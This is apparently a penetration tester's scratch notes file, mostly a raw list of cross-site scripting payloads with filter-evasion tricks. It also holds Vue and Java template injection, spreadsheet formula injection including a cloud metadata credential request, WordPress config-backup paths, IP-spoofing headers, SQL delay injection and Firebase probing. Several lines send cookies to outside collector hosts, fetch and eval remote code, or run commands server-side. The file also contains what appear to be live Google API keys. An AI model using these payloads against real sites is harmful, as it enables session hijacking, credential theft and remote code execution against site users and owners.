XSS_Notes
XSS_Notes
https://thecyberpunker.com/blog/xss-payloads/
https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/
.*\.doit\.com$
https://translation.googleapis.com/language/translate/v2?key=AIzaSyBdJ88HN7LTGk1
2X5whfaVv8a5ozTEMP_k&target=language
https://maps.googleapis.com/maps/api/geocode/json?latlng=40,30&key=AIzaSyC5Lai
ovNX0mzDrDlOoLEKWCH2EWOSQohg
--------------------------------------------------------------------------------------------------------------
----------------------------
--------------------------------------------------------------------------------------------------------------
----------------------------
/(A('onerror=%22alert%601%60%22testabcd))/
/Orders/(A(%22onerror='alert%60xss%60'testabcd))/Login.aspx?ReturnUrl=/Orders
(A(%22onerror='alert%601%60'testabcd))/Login.aspx?ReturnUrl=%2f
"></SCRIPT>--
!><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>%27}};">});});})]--
JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--
></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoF
ocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->
i2lte%22%3e%3cscript%3ealert(1)%3c%2fscript%3eayawz
<A/HRef=javascript:top/**/?.['ale'%2B'rt'](1)>
<</div>script</div>>confirm()<</div>/script</div>>
<svg/onload=window["al"+"ert"]`1337`>
<iframe src="javascript:setTimeout(function() {
/*\*/top['al'+'\u0065'+'rt'](document.domain)/*\*/ }, 5000);"></inpuT%3E;>
<div
onpointerover="javascript:eval(decodeURIComponent(String.f
romCharCode(97, 108, 101, 114, 116, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 100,
111, 109, 97, 105, 110, 41)))" style="width:100%;height:100vh;"></div>
<details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc%28%60xss%60%26
%2300000000000000000041//
<vIdeO><sourCe onerror="['al\u0065'+'rt'][0]['\x63onstructor']['\x63onstructor']('return
this')()[['al\u0065'+'rt'][0]]([String.fromCharCode(8238)+[!+[]+!+[]]+[![]+[]][+[]]])">
<EMBED SRC="data:image/svg+xml;base64,PHN2Zy9vbmxvYWQ9d2luZG93WyJhbCIrI
mVydCJdYDEzMzdgPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBE
D>
<svg/onload=window[“al”+”ert”]`1337`>
<input/onclick=alert(1)>
{{constructor.constructor('alert(document.cookie)')()}}
<image src/onerror=alert("Contact_Name")>
<A href=javascript:alert(1)>asd
<script>alert()<\/script>
<details ontoggle=alert(1)>
<p><a href="mailto:<svg/onload="alert(1)"//@x"><svg/onload="alert(1)"//@x</a></p>
<a target="_blank"
href="data:text/URI,javascript:alert(window.opener.document.cookie);">test</a>
<svg/onload=alert(/1/)>
<svg/on<script>load=prompt(document.domain);>”/>
<script>x=new
XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open(‘GET’,’
file:///etc/hosts’);x.send();</script>
<a href="j	a	v	asc
ri	pt:onclick=alert(1)">Click
me</a>
<script>history.pushState(0,0,’/i/am/somewhere_else’);</script><iframe
onload=”javascript:alert(document.domain)”>
<body onload="javascript:location.replace('\x2fportal\x2fc');">
--------------------------------------------------------------------------------------------------------------
----------------------------
--------------------------------------------------------------------------------------------------------------
----------------------------
<style>@keyframes
a{}b{animation:a;}</style><b/onanimationstart=prompt`${document.domain}`>
<marquee+loop=1+width=0+onfinish='new+Function`al\ert\`1\``'>
<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>
"%3balert`1`%3b"
asd"`> onpointerenter=x=prompt,x`XSS`
<x onauxclick=import('//1152848220/')>click
<x onauxclick=a=alert,a(domain)>click
<x onauxclick=import('//1152848220/')>click
<x onauxclick=import('//xss/')>click
\"<>onauxclick<>=(eval)(atob(`YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==`))>+<sss
{{constructor.constructor(alert`1`)()}}
javascript:new%20Function`al\ert\`1\``;
https://twitter.com/xhzeem/status/1378316651431612422
https://twitter.com/xhzeem/status/1377992310974218245
<script>Object.prototype.BOOMR = 1;Object.prototype.url='https://portswigger-
labs.net/xss/xss.js'</script> -https://portswigger.net/web-security/cross-site-
scripting/cheat-sheet
"><a/\test="%26quot;x%26quot;"href='%01javascript:/*%b1*/;location.assign("//hacke
rone.com/stealthy?x="+location)'>Click
--------------------------------------------------------------------------------------------------------------
----------------------------
--------------------------------------------------------------------------------------------------------------
----------------------------
<a"/onclick=(confirm)()>Click Here!
xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
<a
href="j	a	v	asc
ri	pt:(a	l	e	r&Ta
b;t	(document.domain))">X</a>
<--%253cimg%20onerror=alert(1)%20src=a%253e --!>
<a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'>
javascript:{ alert`0` }
1'"><img/src/onerror=.1|alert``>
%2sscript%2ualert()%2s/script%2u
<svg on onload=(alert)(document.domain)>
“><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;docume
nt.cookie%26%2300000000000000000041;
<svg on =i onload=alert(domain)
<svg/onload=location/**/='https://your.server/'+document.domain>
test",prompt%0A/*HelloWorld*/(document.domain)
"onx+%00+onpointerenter%3dalert(domain)+x"
"><svg%20onload=alert%26%230000000040"1")>
%27%09);%0d%0a%09%09[1].find(alert)//
<svg on onload=(alert)(document.domain)>
<svg/on%20onload=alert(1)> (working)
<img/src=x onError="`${x}`;alert(`Ex.Mi`);">
--------------------------------------------------------------------------------------------------------------
----------------------------
--------------------------------------------------------------------------------------------------------------
----------------------------
">'><details/open/ontoggle=confirm('XSS')>
6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/
--------------------------------------------------------------------------------------------------------------
----------------------------
--------------------------------------------------------------------------------------------------------------
----------------------------
<x/onclick=globalThis['\u0070r\u006f'+'mpt']<)>clickme
tarun"><x/onafterscriptexecute=confirm%26lpar;)//
<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+
v+h+n)(/infected/.source)" />click
<details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%
2b'rt'];throw/**/self['doc'%2b'ument']['domain'];">
<svg onload\r\n=$.globalEval("al"+"ert()");>
<bleh/onclick=top[/al/.source+/ert/.source]	``>click
<sVg OnPointerEnter="location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//</div">
<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='test'}[self][0][v+a+e+s](e+s+v
+h+n)(/infected/.source)" />tap
--------------------------------------------------------------------------------------------------------------
----------------------------
--------------------------------------------------------------------------------------------------------------
----------------------------
<iframe/onload='this["src"]="javas	cript:al"+"ert``"';>
<object
data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></obje
ct>
<svg onload\r\n=$.globalEval("al"+"ert()");>
[1].map(alert) or (alert)(1)
<"><details/open/ontoggle="jAvAsCrIpT:alert(/xss-by-
tarun/)">XXXXX</a>
[1].find(confirm)
<svg/onload=self[`aler`%2b`t`]`1`>
%22%3E%3Cobject%20data=data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwv
c2NyaXB0Pg==%3E%3C/object%3E
'-[document.domain].map(alert)-'
--------------------------------------------------------------------------------------------------------------
----------------------------
--------------------------------------------------------------------------------------------------------------
----------------------------
ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%25
2fscript%253ey6uu6
'">><div><meter onmouseover="alert(1)"</div>"
Wordfence 7.4.2
<a href=javascript:alert(1)>
<a/href=%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;
%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x0a;:alert(1)>please%20cl
ick%20here</a>
--------------------------------------------------------------------------------------------------------------
----------------------------
For Slack
--------------------------------------------------------------------------------------------------------------
----------------------------
'"<b oncut=alert(3)>asd</b>>
<script>alert(1)</script>
'"><b>ssss<a href="google.com">ssss</a><img/src='u'/onerror=alert(7777)>
'"><b>ss<a href="google.com">ssss</a><img/src='u'/onerror=alert()>
<a href="https://www.google.com">Q1</a>
[click here](https://www.google.com"+onclick=alert(1)
--------------------------------------------------------------------------------------------------------------
----------------------------
Random Payloads
--------------------------------------------------------------------------------------------------------------
----------------------------
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(
String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG onmouseover="alert('xxs')">
<IMG
SRC=javascript:a&
#108;ert(
'XSS')>
<IMG
SRC=javascr&
#0000105pt:a&
#0000108ert('X�
083S')>
<IMG
SRC=javascript:a
Cert('XSS')>
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <
\";alert('XSS');//
</script><script>alert('XSS');</script>
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<BODY BACKGROUND="javascript:alert('XSS')">
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="livescript:[code]">
<BODY ONLOAD=alert('XSS')>
<BGSOUND SRC="javascript:alert('XSS');">
<BR SIZE="&{alert('XSS')}">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
exp/*<A STYLE='no\xss:noxss("*//*");
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A
CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<XSS STYLE="xss:expression(alert('XSS'))">
<XSS STYLE="behavior: url(xss.htc);">
¼script¾alert(¢XSS¢)¼/script¾
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-
image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\007
4\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<BASE HREF="javascript:alert('XSS');//">
<IMG
SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciou
scode">
<SCRIPT>document.write("<SCRI");</SCRIPT>PT
SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<A HREF="http://66.102.7.147/">XSS</A>
0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-"
veris-->group<svg/onload=alert(/XSS/)//
%22;alert%28%27RVRSH3LL_XSS%29//
javascript:alert%281%29;
alert;pg("XSS")
<svg/onload=%26%23097lert%26lpar;1337)>
<script>for((i)in(self))eval(i)(1)</script>
<scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt>
<sCR<script>iPt>alert(1)</SCr</script>IPt>
<a
href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
test</a>
Vue JS
{{$emit.constructor`fetch(%27https://8v4y3qmogobk2g6bewqtqa83quwkk9.oastify.co
m%27,%20{%20method:%20%27POST%27,%20mode:%20%27no-
cors%27,%20body:%20document.cookie%20});`()}}
{{$emit.constructor`function b(){eval(this.responseText)};a=new
XMLHttpRequest();a.addEventListener("load", b);a.open("GET",
"//xss.report/s/sid0krypt");a.send()`()}}
{{_Vue.h.constructor('x','console.log(x)')(this)}}
{{_Vue.h.constructor`alert(1)`()}}
{{$emit.constructor`alert(1)`()}}
${\"zjz\".toString().replace(\"j\", \"o\")}
${'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineB
yName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder;
x.command(\\\"ping\\\",\\\"szvta3myzyhu8udxodgghh6hm8sygn.burpcollaborator.net\\\
"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}
*********HTML Injection*********
<a href=https://www.google.com>Link</a>
<a href=https://www.google.com>SLACK</a>
*********Formula Injection*********
=calc|A0!Z
@calc|A0!Z
=cmd|' /C calc'!xxx
=cmd|'/Ccalc.exe'!z
=cmd|' /C notepad'!'A1'
%0A-3+3+cmd|' /C calc'!D2
*********Command Execution*********
=WEBSERVICE("http://169.254.169.254/latest/meta-data/iam/security-credentials/"),
=WEBSERVICE("http://7498qogq07az5hxtjvy2ks36ixooce03.oastify.com"),
=INFO("/etc/passwd"),
=INFO("SYSTEM"),
=INFO("OSVERSION")
*********CSRF*********
http://gursevkalra.blogspot.com/2011/12/json-csrf-with-parameter-padding.html ----
JSON Padding
https://www.geekboy.ninja/blog/tag/json-csrf/ -------------------------------------JSON
Padding
coockie language:en
X-Forwared-Host:Blueinfy
xmlrpc.php
<?xml version="1.0"?>
<methodCall>
<methodName>system.listMethods</methodName>
<params>
</params>
</methodCall>
https://kipwise.com/xmlrpc.php
<?xml version="1.0"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params><params>
<value><string>http://</string></value>
</param><param><value><string>https://kipwish.com</string>
</value></param></params>
</methodCall>
curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL
--------------------------------------------------------------------------------------------------------------
----------------------------
Wordpress
--------------------------------------------------------------------------------------------------------------
----------------------------
/.htaccess
/wp-includes/
/wp-json/
/wp-content/uploads/
/wp-json/wp/v2/users
/wp-admin
/wp-admin/admin-ajax.php
/wp-json/?rest_route=/wp/v2/users/
/wp-config.php-backup /wp-config.php.orig
/.wp-config.php.swp
/wp-config-sample.php /wp-config.inc
/wp-config.old
/wp-config.txt
/wp-config.php.txt
/wp-config.php.bak
/wp-config.php.old
/wp-config.php.dist
/wp-config.php.inc
/wp-config.php.swp
/wp-config.php.html
/wp-config-backup.txt /wp-config.php.save
/wp-config.php~
/wp-config.php.original
/_wpeprivate/config.json
#elementor-
action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwOi8vIiwidml
kZW9UeXBlIjoiaG9zdGVkIiwidmlkZW9QYXJhbXMiOnsib25lcnJvciI6ImFsZXJ0KGRvY3VtZ
W50LmRvbWFpbikifX0=
{{5*5}}
https://autocode.com/guides/how-to-build-a-slack-bot/
x-forwarded-scheme: http
X-forwarded-host: host
X-Real-IP: 127.0.0.1
X-Client-IP: 120.0.0.1
X-Rewrite-URL: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-ProxyUser-Ip: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Original-URL: 127.0.0.1
X-Forwarded: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
True-Client-IP: 127.0.0.1
WebChat.createDirectLine({userEmail:'[email protected]'});
https://calendar.google.com/calendar/b/1/r?cid=users_mail_address@company_name
.com
https://gitlab.com/dee-see/notkeyhacks
' waitfor delay'0:0:15'--
Error Base
union Base
Cryptographic Failuare
Injection
Insecure Designed
Security Misconfiguration
SSFR
Firebase:
https://blog.appsecco.com/exploiting-weak-configurations-in-google-identity-platform-
cbddbd0e71e3
https://hacktricks.boitatech.com.br/pentesting/pentesting-web/buckets/firebase-
database
__/firebase/init.json
GET /v1alpha/projects/-
/apps/1:361636954636:web:220eedf13a3a1aa0d36429/webConfig HTTP/2
Host: firebase.googleapis.com
X-Goog-Api-Key: AIzaSyB8KMna82QZS8RR9mIjO-xOzq19E4Vx-gg
Hint: `whoami`.<burp>